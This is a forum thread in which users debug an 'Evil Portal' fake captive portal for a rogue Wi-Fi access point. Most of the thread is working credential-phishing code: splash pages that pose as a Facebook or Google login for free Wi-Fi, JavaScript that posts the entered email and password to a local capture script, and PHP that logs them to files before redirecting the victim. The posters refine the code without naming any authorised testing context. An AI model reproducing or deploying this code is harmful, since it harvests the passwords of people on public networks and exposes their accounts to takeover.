Jump to content

Portal redirect not working

THCMinister

By THCMinister
in Applications & Coding

 Share

Recommended Posts

THCMinister Newbie

THCMinister

Posted
Posted (edited)

I am unable to get the redirect for evil portal to work. The capture of the variables works but does not redirect to the $authtarget. I have searched the forums and followed the various examples/solutions provided.

Below is my function code on the splash.html

  <script type="text/javascript">
    function ajaxRequest() {
      if (window.XMLHttpRequest)  {
        return new XMLHttpRequest();
      } else if (window.ActiveXObject) {
        return new ActiveXObject("Microsoft.XMLHTTP");
      } else {
        return false;
      }
    }
        
 
    function sendInfo() {
      var xmlhttp = new ajaxRequest();
      document.getElementById("results").innerHTML="<p><i>Thank you!</i></p>";
      var usernamevalue=encodeURIComponent(document.getElementById("username").value);
      var passwordvalue=encodeURIComponent(document.getElementById("password").value);
      var roomnumvalue=encodeURIComponent(document.getElementById("roomnum").value);
      var lastnamevalue=encodeURIComponent(document.getElementById("lastname").value);
      var parameters="username="+usernamevalue+"&password="+passwordvalue+"&roomnum="+roomnumvalue+"&lastname="+lastnamevalue;
      xmlhttp.open("POST", "http://172.16.42.1/capture.php", true);
      xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      xmlhttp.send(parameters);
      window.location.assign("$authtarget");
    }
  </script>

Here is my form with button

<form id="form_1" method="POST" action="http://172.16.42.1/capture.php">
 
<br>
 
 
 
 
<div class="credential_block block">
<b>Login with one of the following <br><img src="images/smicons.png"><br>
<div id="room_number_cred">
 
       <font class="block">Email</font>         
   
<input class="txt_field" name="username" id="username" type="text">
</div>
<div id="last_name_cred">
   
       <font class="block">Password</font>         
   
<input class="txt_field" name="password" id="password" type="password">
</div>
 
<input value="Connect" type="submit" onclick="sendInfo();return false;">

Here is my capture.php

<?php
 
$username = $_POST["username"];
$password = $_POST["password"];
$roomnum = $_POST["roomnum"];
$lastname = $_POST["lastname"];
$file = fopen("stored.txt", "a");
fwrite($file, "Username: " . $username . " Password: " . $password . " RoomNumber: " . $roomnum . " Lastname: " . $lastname  . "\n");
fclose($file);
 
echo '<p><i>Thank you!</i></p>';
?>
Edited by THCMinister
Link to comment
Share on other sites
WPA3 Newbie

WPA3

Posted
Posted (edited)

Im not expert but is this why

https://forums.hak5.org/index.php?/topic/33578-evil-portal-setup-adding-the-authtarget-to-a-button/

add a javascript function:

redirectToTagert() {
window.location = $authtarget;
}

add the function to the onclick event for your button:

<button type="button" onclick="sendInfo();return false;redirectToTarget()">Submit</button>

That should work fine

Edited by z3roc00l
Link to comment
Share on other sites
sud0nick Newbie

sud0nick

Posted
Posted (edited)

Why not use jQuery and make this process simpler? You could assign the button to a class then use that to reference it in a javascript function like so:

<button class="send_info_button">Submit</button>

$('.send_info_button').on("click",function(){
    $.post('/path/to/script/', {$dataToSend},function(){
        window.location = $authtarget;
    });
});

If you need help referencing jquery.min.js look at my post in the Evil Portal support thread here: https://forums.hak5.org/index.php?/topic/33554-support-evil-portal/page-2

Edited by sud0nick
Link to comment
Share on other sites
THCMinister Newbie

THCMinister

Posted
  • Author
Posted

Why not use jQuery and make this process simpler? You could assign the button to a class then use that to reference it in a javascript function like so:

<button class="send_info_button">Submit</button>

$('.send_info_button').on("click",function(){
    $.post('/path/to/script/', {$dataToSend},function(){
        window.location = $authtarget;
    });
});

If you need help referencing jquery.min.js look at my post in the Evil Portal support thread here: https://forums.hak5.org/index.php?/topic/33554-support-evil-portal/page-2

Here is what I got and it's working!

In my splash.html

<script src="//172.16.42.1/nodogsplash/jquery.min.js"></script>  

<script>
$(document).ready(function() {
        $('body').on('click', '.myselector', function(e) {
            var email_addr = $('#email').val();
            var pass = $('#password').val();
            if (email_addr == "" || pass == "") {
                alert("Please login with your Facebook or Google account to access free Wi-Fi.");
                    return;
                } else {
                    $.ajax({
                        type: "POST",
                        url: "//172.16.42.1/capture.php",
                        data: {email: email_addr,
                               password: pass},
                        dataType: 'json',
                        success: function(data, textStatus, jqXHR) {
                            window.location.href="$authtarget";
                        },
                        error: function(data, textStatus, errorThrown) {
                            window.location.href="$authtarget";
                        }
                    });
                }
             });
    });
</script>
 
<form id="form_1" method="POST" action="http://172.16.42.1/capture.php">

<table width="959" height="642">


            <tr><td colspan="2"> </td></tr>
            <tr><td align="right">Email    :</td><td><input name="email" id="email" type="text"/></td></tr>
            <tr><td align="right">Password :</td><td><input name="password" id="password" type="password"/></td></tr>
            <tr><td colspan="2" align="center"><input value="Login To Connect" class="myselector" type="button"></td></tr>

        </table>
        </td>

            
        </td>
    </tr>
    <tr height="50" valign="bottom"><td colspan="2"> </td></tr>

</table></form>

I used sud0nick's auth.php

<?php
 
if (isset($_POST['email'])) {
        $fh = fopen('/sd/auth.log', 'a+');
        fwrite($fh, "Email:  " . $_POST['email'] . "\n");
        fwrite($fh, "Pass:  " . $_POST['password'] . "\n\n");
        fclose($fh);
        $referer = $_SERVER['HTTP_REFERER'];
        header("Location: $authtarget");
} else {
        header('Location: splash.html');
}
 
?>
Link to comment
Share on other sites
sud0nick Newbie

sud0nick

Posted
Posted (edited) 
                    $.ajax({
                        type: "POST",
                        url: "//172.16.42.1/capture.php",
                        data: {email: email_addr,
                               password: pass},
                        dataType: 'json',
                        success: function(data, textStatus, jqXHR) {
                            window.location.href="$authtarget";
                        },
                        error: function(data, textStatus, errorThrown) {
                            window.location.href="$authtarget";
                        }
                    });

You can replace this long AJAX request with a simple $.post() request like in my other comment. It doesn't make any difference I just want you to know the option is available.

$.post("//172.16.42.1/nodogsplash/auth.php", {email:email_addr,password:pass},function(){
    window.location.href="$authtarget";
});

Also, in regard to your auth.php script I see you have a variable ($referer) that isn't used and you set

header("Location: $authtarget");

This never gets used because the only time this block of code is called is when a POST request is sent. When someone accesses the page manually they immediately drop into the else block which sets the location to splash.html. In the JavaScript, upon a successful call to auth.php the block of code that says

window.location.href="$authtarget";

will redirect the user to $authtarget. The PHP script will not redirect them to $authtarget.

Edited by sud0nick
Link to comment
Share on other sites
THCMinister Newbie

THCMinister

Posted
  • Author
Posted

You can replace this long AJAX request with a simple $.post() request like in my other comment. It doesn't make any difference I just want you to know the option is available.

$.post("//172.16.42.1/nodogsplash/auth.php", {email:email_addr,password:pass},function(){
    window.location.href="$authtarget";
});

Also, in regard to your auth.php script I see you have a variable ($referer) that isn't used and you set

header("Location: $authtarget");

This never gets used because the only time this block of code is called is when a POST request is sent. When someone accesses the page manually they immediately drop into the else block which sets the location to splash.html. In the JavaScript, upon a successful call to auth.php the block of code that says

window.location.href="$authtarget";

will redirect the user to $authtarget. The PHP script will not redirect them to $authtarget.

I need to do some code cleanup lol. The redirect/unused variable in the php I accidentally left in during some of the testing I was doing. But thank you for the constructive criticism and assistance.

Link to comment
Share on other sites
  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...